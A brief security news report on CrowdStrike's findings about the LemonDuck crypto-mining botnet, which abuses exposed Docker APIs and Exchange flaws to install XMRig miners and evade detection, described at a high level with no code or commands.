According to researchers from CrowdStrike, a new botnet was discovered that uses exposed Docker APIs to compromise devices like Microsoft Exchanges servers.
It appears that an unknown threat actor is using the LemonDuck crypto mining botnet which targets Exchange servers via ProxyLogon in order to mine cryptocurrency.
After looking for exposed Docker APIs for unauthorized access, the attacker can run a malicious container by using a custom entry point to download the Bash script disguised as a core.png image file.
After gaining initial access to server resources, the attacker can use known exploits to escalate privileges and install crypto miners while spreading across the network. They can also install files that prevent detection from any antivirus scanning applications that are installed on compromised machines.
The attackers are using XMRig to mine Monero which is a privacy-oriented cryptocurrency that claims to be very difficult to trace.
Security researchers from CrowdStrike also said that LemonDuck comes with a file called “a.asp” which can actually disable the aliyun service on Alibaba’s Cloud and therefore avoid being detected.
With the rising price of cryptocurrencies in the past few years, crypto miners have become extremely popular, especially since they can be easily sold on many crypto markets.